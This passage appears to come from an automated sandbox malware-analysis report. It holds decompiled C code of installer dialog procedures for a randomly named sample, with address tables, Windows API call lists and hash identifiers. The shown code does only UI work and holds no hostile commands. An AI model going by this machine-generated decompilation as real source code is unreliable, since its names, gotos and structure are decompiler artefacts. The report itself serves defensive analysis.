                                                          				signed char* _t278;
                                                          				signed char _t279;
                                                          				long _t284;
                                                          				struct HWND__* _t291;
                                                          				signed int* _t292;
                                                          				int _t293;
                                                          				long _t294;
                                                          				signed int _t295;
                                                          				void* _t297;
                                                          				long _t298;
                                                          				int _t299;
                                                          				signed int _t300;
                                                          				signed int _t303;
                                                          				signed int _t311;
                                                          				signed char* _t319;
                                                          				int _t324;
                                                          				void* _t326;
                                                          
                                                          				_t291 = _a4;
                                                          				_v12 = GetDlgItem(_t291, 0x3f9);
                                                          				_v8 = GetDlgItem(_t291, 0x408);
                                                          				_t326 = SendMessageW;
                                                          				_v24 =  *0x42a288;
                                                          				_v28 =  *0x42a270 + 0x94;
                                                          				if(_a8 != 0x110) {
                                                          					L23:
                                                          					if(_a8 != 0x405) {
                                                          						_t301 = _a16;
                                                          					} else {
                                                          						_a12 = 0;
                                                          						_t301 = 1;
                                                          						_a8 = 0x40f;
                                                          						_a16 = 1;
                                                          					}
                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                          						_v16 = _t301;
                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                          							if(( *0x42a279 & 0x00000002) != 0) {
                                                          								L41:
                                                          								if(_v16 != 0) {
                                                          									_t237 = _v16;
                                                          									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                          										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                          									}
                                                          									_t238 = _v16;
                                                          									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                          										_t301 = _v24;
                                                          										_t239 =  *(_t238 + 0x5c);
                                                          										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                          										} else {
                                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L48;
                                                          							}
                                                          							if(_a8 == 0x413) {
                                                          								L33:
                                                          								_t301 = 0 | _a8 != 0x00000413;
                                                          								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                          								_t295 = _t245;
                                                          								if(_t295 >= 0) {
                                                          									_t94 = _v24 + 8; // 0x8
                                                          									_t301 = _t245 * 0x818 + _t94;
                                                          									_t247 =  *_t301;
                                                          									if((_t247 & 0x00000010) == 0) {
                                                          										if((_t247 & 0x00000040) == 0) {
                                                          											_t248 = _t247 ^ 0x00000001;
                                                          										} else {
                                                          											_t254 = _t247 ^ 0x00000080;
                                                          											if(_t254 >= 0) {
                                                          												_t248 = _t254 & 0x000000fe;
                                                          											} else {
                                                          												_t248 = _t254 | 0x00000001;
                                                          											}
                                                          										}
                                                          										 *_t301 = _t248;
                                                          										E0040117D(_t295);
                                                          										_a12 = _t295 + 1;
                                                          										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                          										_a8 = 0x40f;
                                                          									}
                                                          								}
                                                          								goto L41;
                                                          							}
                                                          							_t301 = _a16;
                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                          								goto L41;
                                                          							}
                                                          							goto L33;
                                                          						} else {
                                                          							goto L48;
                                                          						}
                                                          					} else {
                                                          						L48:
                                                          						if(_a8 != 0x111) {
                                                          							L56:
                                                          							if(_a8 == 0x200) {
                                                          								SendMessageW(_v8, 0x200, 0, 0);
                                                          							}
                                                          							if(_a8 == 0x40b) {
                                                          								_t225 =  *0x42372c;
                                                          								if(_t225 != 0) {
                                                          									ImageList_Destroy(_t225);
                                                          								}
                                                          								_t226 =  *0x423740;
                                                          								if(_t226 != 0) {
                                                          									GlobalFree(_t226);
                                                          								}
                                                          								 *0x42372c = 0;
                                                          								 *0x423740 = 0;
                                                          								 *0x42a2c0 = 0;
                                                          							}
                                                          							if(_a8 != 0x40f) {
                                                          								L90:
                                                          								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                          									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                          									ShowWindow(_v8, _t324);
                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                          								}
                                                          								goto L93;
                                                          							} else {
                                                          								E004011EF(_t301, 0, 0);
                                                          								_t198 = _a12;
                                                          								if(_t198 != 0) {
                                                          									if(_t198 != 0xffffffff) {
                                                          										_t198 = _t198 - 1;
                                                          									}
                                                          									_push(_t198);
                                                          									_push(8);
                                                          									E00404FFF();
                                                          								}
                                                          								if(_a16 == 0) {
                                                          									L75:
                                                          									E004011EF(_t301, 0, 0);
                                                          									_v36 =  *0x423740;
                                                          									_t201 =  *0x42a288;
                                                          									_v64 = 0xf030;
                                                          									_v24 = 0;
                                                          									if( *0x42a28c <= 0) {
                                                          										L86:
                                                          										if( *0x42a31e == 0x400) {
                                                          											InvalidateRect(_v8, 0, 1);
                                                          										}
                                                          										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                          											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                          										}
                                                          										goto L90;
                                                          									}
                                                          									_t292 = _t201 + 8;
                                                          									do {
                                                          										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                          										if(_t207 != 0) {
                                                          											_t303 =  *_t292;
                                                          											_v72 = _t207;
                                                          											_v76 = 8;
                                                          											if((_t303 & 0x00000001) != 0) {
                                                          												_v76 = 9;
                                                          												_v60 =  &(_t292[4]);
                                                          												_t292[0] = _t292[0] & 0x000000fe;
                                                          											}
                                                          											if((_t303 & 0x00000040) == 0) {
                                                          												_t211 = (_t303 & 0x00000001) + 1;
                                                          												if((_t303 & 0x00000010) != 0) {
                                                          													_t211 = _t211 + 3;
                                                          												}
                                                          											} else {
                                                          												_t211 = 3;
                                                          											}
                                                          											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                          											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                          											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                          										}
                                                          										_v24 = _v24 + 1;
                                                          										_t292 =  &(_t292[0x206]);
                                                          									} while (_v24 <  *0x42a28c);
                                                          									goto L86;
                                                          								} else {
                                                          									_t293 = E004012E2( *0x423740);
                                                          									E00401299(_t293);
                                                          									_t222 = 0;
                                                          									_t301 = 0;
                                                          									if(_t293 <= 0) {
                                                          										L74:
                                                          										SendMessageW(_v12, 0x14e, _t301, 0);
                                                          										_a16 = _t293;
                                                          										_a8 = 0x420;
                                                          										goto L75;
                                                          									} else {
                                                          										goto L71;
                                                          									}
                                                          									do {
                                                          										L71:
                                                          										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                          											_t301 = _t301 + 1;
                                                          										}
                                                          										_t222 = _t222 + 1;
                                                          									} while (_t222 < _t293);
                                                          									goto L74;
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                          							goto L93;
                                                          						} else {
                                                          							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                          							if(_t232 == 0xffffffff) {
                                                          								goto L93;
                                                          							}
                                                          							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                          							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                          								_t294 = 0x20;
                                                          							}
                                                          							E00401299(_t294);
                                                          							SendMessageW(_a4, 0x420, 0, _t294);
                                                          							_a12 = _a12 | 0xffffffff;
                                                          							_a16 = 0;
                                                          							_a8 = 0x40f;
                                                          							goto L56;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_v36 = 0;
                                                          					_v20 = 2;
                                                          					 *0x42a2c0 = _t291;
                                                          					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                          					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                          					 *0x423734 =  *0x423734 | 0xffffffff;
                                                          					_t297 = _t258;
                                                          					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                          					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                          					 *0x42372c = _t260;
                                                          					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                          					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                          						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                          					}
                                                          					DeleteObject(_t297);
                                                          					_t298 = 0;
                                                          					do {
                                                          						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                          						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                          							if(_t298 != 0x20) {
                                                          								_v20 = 0;
                                                          							}
                                                          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                          						}
                                                          						_t298 = _t298 + 1;
                                                          					} while (_t298 < 0x21);
                                                          					_t299 = _a16;
                                                          					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                          					_push(0x15);
                                                          					E004045C4(_a4);
                                                          					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                          					_push(0x16);
                                                          					E004045C4(_a4);
                                                          					_t300 = 0;
                                                          					_v16 = 0;
                                                          					if( *0x42a28c <= 0) {
                                                          						L19:
                                                          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                          						goto L20;
                                                          					} else {
                                                          						_t319 = _v24 + 8;
                                                          						_v32 = _t319;
                                                          						do {
                                                          							_t278 =  &(_t319[0x10]);
                                                          							if( *_t278 != 0) {
                                                          								_v64 = _t278;
                                                          								_t279 =  *_t319;
                                                          								_v88 = _v16;
                                                          								_t311 = 0x20;
                                                          								_v84 = 0xffff0002;
                                                          								_v80 = 0xd;
                                                          								_v68 = _t311;
                                                          								_v44 = _t300;
                                                          								_v72 = _t279 & _t311;
                                                          								if((_t279 & 0x00000002) == 0) {
                                                          									if((_t279 & 0x00000004) == 0) {
                                                          										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                          									} else {
                                                          										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                          									}
                                                          								} else {
                                                          									_v80 = 0x4d;
                                                          									_v48 = 1;
                                                          									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                          									_v36 = 1;
                                                          									 *( *0x423740 + _t300 * 4) = _t284;
                                                          									_v16 =  *( *0x423740 + _t300 * 4);
                                                          								}
                                                          							}
                                                          							_t300 = _t300 + 1;
                                                          							_t319 =  &(_v32[0x818]);
                                                          							_v32 = _t319;
                                                          						} while (_t300 <  *0x42a28c);
                                                          						if(_v36 != 0) {
                                                          							L20:
                                                          							if(_v20 != 0) {
                                                          								E004045F9(_v8);
                                                          								goto L23;
                                                          							} else {
                                                          								ShowWindow(_v12, 5);
                                                          								E004045F9(_v12);
                                                          								L93:
                                                          								return E0040462B(_a8, _a12, _a16);
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}


























































                                                          0x00405038
                                                          0x00405051
                                                          0x00405056
                                                          0x0040505e
                                                          0x00405064
                                                          0x0040507a
                                                          0x0040507d
                                                          0x004052a8
                                                          0x004052af
                                                          0x004052c3
                                                          0x004052b1
                                                          0x004052b3
                                                          0x004052b6
                                                          0x004052b7
                                                          0x004052be
                                                          0x004052be
                                                          0x004052cf
                                                          0x004052dd
                                                          0x004052e0
                                                          0x004052f6
                                                          0x0040536b
                                                          0x0040536e
                                                          0x00405370
                                                          0x0040537a
                                                          0x00405388
                                                          0x00405388
                                                          0x0040538a
                                                          0x00405394
                                                          0x0040539a
                                                          0x0040539d
                                                          0x004053a0
                                                          0x004053bb
                                                          0x004053a2
                                                          0x004053ac
                                                          0x004053ac
                                                          0x004053a0
                                                          0x00405394
                                                          0x00000000
                                                          0x0040536e
                                                          0x004052fb
                                                          0x00405306
                                                          0x0040530b
                                                          0x00405312
                                                          0x00405317
                                                          0x0040531b
                                                          0x00405326
                                                          0x00405326
                                                          0x0040532a
                                                          0x0040532e
                                                          0x00405332
                                                          0x00405345
                                                          0x00405334
                                                          0x00405334
                                                          0x0040533b
                                                          0x00405341
                                                          0x0040533d
                                                          0x0040533d
                                                          0x0040533d
                                                          0x0040533b
                                                          0x00405349
                                                          0x0040534b
                                                          0x0040535e
                                                          0x00405361
                                                          0x00405364
                                                          0x00405364
                                                          0x0040532e
                                                          0x00000000
                                                          0x0040531b
                                                          0x004052fd
                                                          0x00405304
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004053be
                                                          0x004053be
                                                          0x004053c5
                                                          0x00405436
                                                          0x0040543e
                                                          0x00405446
                                                          0x00405446
                                                          0x0040544f
                                                          0x00405451
                                                          0x00405458
                                                          0x0040545b
                                                          0x0040545b
                                                          0x00405461
                                                          0x00405468
                                                          0x0040546b
                                                          0x0040546b
                                                          0x00405471
                                                          0x00405477
                                                          0x0040547d
                                                          0x0040547d
                                                          0x0040548a
                                                          0x004055eb
                                                          0x004055f2
                                                          0x0040560f
                                                          0x00405615
                                                          0x00405627
                                                          0x00405627
                                                          0x00000000
                                                          0x00405490
                                                          0x00405492
                                                          0x00405497
                                                          0x0040549c
                                                          0x004054a1
                                                          0x004054a3
                                                          0x004054a3
                                                          0x004054a4
                                                          0x004054a5
                                                          0x004054a7
                                                          0x004054a7
                                                          0x004054af
                                                          0x004054f0
                                                          0x004054f2
                                                          0x00405502
                                                          0x00405505
                                                          0x0040550a
                                                          0x00405511
                                                          0x00405514
                                                          0x004055b6
                                                          0x004055bf
                                                          0x004055c7
                                                          0x004055c7
                                                          0x004055d5
                                                          0x004055e6
                                                          0x004055e6
                                                          0x00000000
                                                          0x004055d5
                                                          0x0040551a
                                                          0x0040551d
                                                          0x00405523
                                                          0x00405528
                                                          0x0040552a
                                                          0x0040552c
                                                          0x00405532
                                                          0x00405539
                                                          0x0040553e
                                                          0x00405545
                                                          0x00405548
                                                          0x00405548
                                                          0x0040554f
                                                          0x0040555b
                                                          0x0040555f
                                                          0x00405561
                                                          0x00405561
                                                          0x00405551
                                                          0x00405553
                                                          0x00405553
                                                          0x00405581
                                                          0x0040558d
                                                          0x0040559c
                                                          0x0040559c
                                                          0x0040559e
                                                          0x004055a1
                                                          0x004055aa
                                                          0x00000000
                                                          0x004054b1
                                                          0x004054bc
                                                          0x004054bf
                                                          0x004054c4
                                                          0x004054c6
                                                          0x004054ca
                                                          0x004054da
                                                          0x004054e4
                                                          0x004054e6
                                                          0x004054e9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004054cc
                                                          0x004054cc
                                                          0x004054d2
                                                          0x004054d4
                                                          0x004054d4
                                                          0x004054d5
                                                          0x004054d6
                                                          0x00000000
                                                          0x004054cc
                                                          0x004054af
                                                          0x0040548a
                                                          0x004053cd
                                                          0x00000000
                                                          0x004053e3
                                                          0x004053ed
                                                          0x004053f2
                                                          0x00000000
                                                          0x00000000
                                                          0x00405404
                                                          0x00405409
                                                          0x00405415
                                                          0x00405415
                                                          0x00405417
                                                          0x00405426
                                                          0x00405428
                                                          0x0040542c
                                                          0x0040542f
                                                          0x00000000
                                                          0x0040542f
                                                          0x004053cd
                                                          0x00405083
                                                          0x00405088
                                                          0x00405091
                                                          0x00405098
                                                          0x004050aa
                                                          0x004050b5
                                                          0x004050bb
                                                          0x004050c9
                                                          0x004050dd
                                                          0x004050e2
                                                          0x004050ef
                                                          0x004050f4
                                                          0x0040510a
                                                          0x0040511b
                                                          0x00405128
                                                          0x00405128
                                                          0x0040512b
                                                          0x00405131
                                                          0x00405133
                                                          0x00405136
                                                          0x0040513b
                                                          0x00405140
                                                          0x00405142
                                                          0x00405142
                                                          0x00405162
                                                          0x00405162
                                                          0x00405164
                                                          0x00405165
                                                          0x0040516a
                                                          0x00405170
                                                          0x00405174
                                                          0x00405179
                                                          0x00405181
                                                          0x00405185
                                                          0x0040518a
                                                          0x0040518f
                                                          0x00405197
                                                          0x0040519a
                                                          0x0040526a
                                                          0x0040527d
                                                          0x00000000
                                                          0x004051a0
                                                          0x004051a3
                                                          0x004051a6
                                                          0x004051a9
                                                          0x004051a9
                                                          0x004051af
                                                          0x004051b8
                                                          0x004051bb
                                                          0x004051bf
                                                          0x004051c2
                                                          0x004051c5
                                                          0x004051ce
                                                          0x004051d7
                                                          0x004051da
                                                          0x004051dd
                                                          0x004051e0
                                                          0x0040521e
                                                          0x00405249
                                                          0x00405220
                                                          0x0040522f
                                                          0x0040522f
                                                          0x004051e2
                                                          0x004051e5
                                                          0x004051f3
                                                          0x004051fd
                                                          0x00405205
                                                          0x0040520c
                                                          0x00405217
                                                          0x00405217
                                                          0x004051e0
                                                          0x0040524f
                                                          0x00405250
                                                          0x0040525c
                                                          0x0040525c
                                                          0x00405268
                                                          0x00405283
                                                          0x00405286
                                                          0x004052a3
                                                          0x00000000
                                                          0x00405288
                                                          0x0040528d
                                                          0x00405296
                                                          0x00405629
                                                          0x0040563b
                                                          0x0040563b
                                                          0x00405286
                                                          0x00000000
                                                          0x00405268
                                                          0x0040519a

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00405049
                                                          • GetDlgItem.USER32 ref: 00405054
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                          • LoadImageW.USER32 ref: 004050B5
                                                          • SetWindowLongW.USER32 ref: 004050CE
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                          • DeleteObject.GDI32(00000000), ref: 0040512B
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                          • SetWindowLongW.USER32 ref: 0040527D
                                                          • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                          • GlobalFree.KERNEL32 ref: 0040546B
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                          • ShowWindow.USER32(?,00000000), ref: 00405615
                                                          • GetDlgItem.USER32 ref: 00405620
                                                          • ShowWindow.USER32(00000000), ref: 00405627
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                          • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                          • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                          • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void* _v16;
                                                          				struct HWND__* _t56;
                                                          				signed int _t75;
                                                          				signed short* _t76;
                                                          				signed short* _t78;
                                                          				long _t92;
                                                          				int _t103;
                                                          				signed int _t110;
                                                          				intOrPtr _t113;
                                                          				WCHAR* _t114;
                                                          				signed int* _t116;
                                                          				WCHAR* _t117;
                                                          				struct HWND__* _t118;
                                                          
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 != 0x111) {
                                                          						L13:
                                                          						if(_a8 != 0x4e) {
                                                          							if(_a8 == 0x40b) {
                                                          								 *0x421714 =  *0x421714 + 1;
                                                          							}
                                                          							L27:
                                                          							_t114 = _a16;
                                                          							L28:
                                                          							return E0040462B(_a8, _a12, _t114);
                                                          						}
                                                          						_t56 = GetDlgItem(_a4, 0x3e8);
                                                          						_t114 = _a16;
                                                          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                          							_v12 = _t103;
                                                          							_v16 = _t113;
                                                          							_v8 = 0x428200;
                                                          							if(_t103 - _t113 < 0x800) {
                                                          								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                          								SetCursor(LoadCursorW(0, 0x7f02));
                                                          								_push(1);
                                                          								E00404A32(_a4, _v8);
                                                          								SetCursor(LoadCursorW(0, 0x7f00));
                                                          								_t114 = _a16;
                                                          							}
                                                          						}
                                                          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                          							goto L28;
                                                          						} else {
                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                          								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                          							}
                                                          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                          								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                          							}
                                                          							return 1;
                                                          						}
                                                          					}
                                                          					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                          						goto L27;
                                                          					} else {
                                                          						_t116 =  *0x422720 + 0x14;
                                                          						if(( *_t116 & 0x00000020) == 0) {
                                                          							goto L27;
                                                          						}
                                                          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                          						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                          						E00404A0E();
                                                          						goto L13;
                                                          					}
                                                          				}
                                                          				_t117 = _a16;
                                                          				_t75 =  *(_t117 + 0x30);
                                                          				if(_t75 < 0) {
                                                          					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                          				}
                                                          				_t76 =  *0x42a298 + _t75 * 2;
                                                          				_t110 =  *_t76 & 0x0000ffff;
                                                          				_a8 = _t110;
                                                          				_t78 =  &(_t76[1]);
                                                          				_a16 = _t78;
                                                          				_v16 = _t78;
                                                          				_v12 = 0;
                                                          				_v8 = E00404734;
                                                          				if(_t110 != 2) {
                                                          					_v8 = E004046FA;
                                                          				}
                                                          				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                          				_push(0x22);
                                                          				E004045C4(_a4);
                                                          				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                          				_push(0x23);
                                                          				E004045C4(_a4);
                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                          				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                          				_t118 = GetDlgItem(_a4, 0x3e8);
                                                          				E004045F9(_t118);
                                                          				SendMessageW(_t118, 0x45b, 1, 0);
                                                          				_t92 =  *( *0x42a270 + 0x68);
                                                          				if(_t92 < 0) {
                                                          					_t92 = GetSysColor( ~_t92);
                                                          				}
                                                          				SendMessageW(_t118, 0x443, 0, _t92);
                                                          				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                          				 *0x421714 = 0;
                                                          				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                          				 *0x421714 = 0;
                                                          				return 0;
                                                          			}


















                                                          0x00404795
                                                          0x004048c2
                                                          0x0040491f
                                                          0x00404923
                                                          0x004049f0
                                                          0x004049f2
                                                          0x004049f2
                                                          0x004049f8
                                                          0x004049f8
                                                          0x004049fb
                                                          0x00000000
                                                          0x00404a02
                                                          0x00404931
                                                          0x00404937
                                                          0x00404941
                                                          0x0040494c
                                                          0x0040494f
                                                          0x00404952
                                                          0x0040495d
                                                          0x00404960
                                                          0x00404967
                                                          0x00404974
                                                          0x00404985
                                                          0x0040498b
                                                          0x00404993
                                                          0x004049a1
                                                          0x004049a7
                                                          0x004049a7
                                                          0x00404967
                                                          0x004049b1
                                                          0x00000000
                                                          0x004049bc
                                                          0x004049c0
                                                          0x004049d0
                                                          0x004049d0
                                                          0x004049d6
                                                          0x004049e2
                                                          0x004049e2
                                                          0x00000000
                                                          0x004049e6
                                                          0x004049b1
                                                          0x004048cd
                                                          0x00000000
                                                          0x004048df
                                                          0x004048e4
                                                          0x004048ea
                                                          0x00000000
                                                          0x00000000
                                                          0x00404913
                                                          0x00404915
                                                          0x0040491a
                                                          0x00000000
                                                          0x0040491a
                                                          0x004048cd
                                                          0x0040479b
                                                          0x0040479e
                                                          0x004047a3
                                                          0x004047b4
                                                          0x004047b4
                                                          0x004047bc
                                                          0x004047bf
                                                          0x004047c3
                                                          0x004047c6
                                                          0x004047ca
                                                          0x004047cd
                                                          0x004047d0
                                                          0x004047d3
                                                          0x004047da
                                                          0x004047dc
                                                          0x004047dc
                                                          0x004047e6
                                                          0x004047f3
                                                          0x004047fd
                                                          0x00404802
                                                          0x00404805
                                                          0x0040480a
                                                          0x00404821
                                                          0x00404828
                                                          0x0040483b
                                                          0x0040483e
                                                          0x00404852
                                                          0x00404859
                                                          0x0040485e
                                                          0x00404863
                                                          0x00404863
                                                          0x00404871
                                                          0x0040487f
                                                          0x00404891
                                                          0x00404896
                                                          0x004048a6
                                                          0x004048a8
                                                          0x00000000

                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                          • GetDlgItem.USER32 ref: 00404835
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                          • GetSysColor.USER32(?), ref: 00404863
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                          • lstrlenW.KERNEL32(?), ref: 00404884
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                          • GetDlgItem.USER32 ref: 004048FF
                                                          • SendMessageW.USER32(00000000), ref: 00404906
                                                          • GetDlgItem.USER32 ref: 00404931
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                          • SetCursor.USER32(00000000), ref: 00404985
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                          • SetCursor.USER32(00000000), ref: 004049A1
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                          Strings
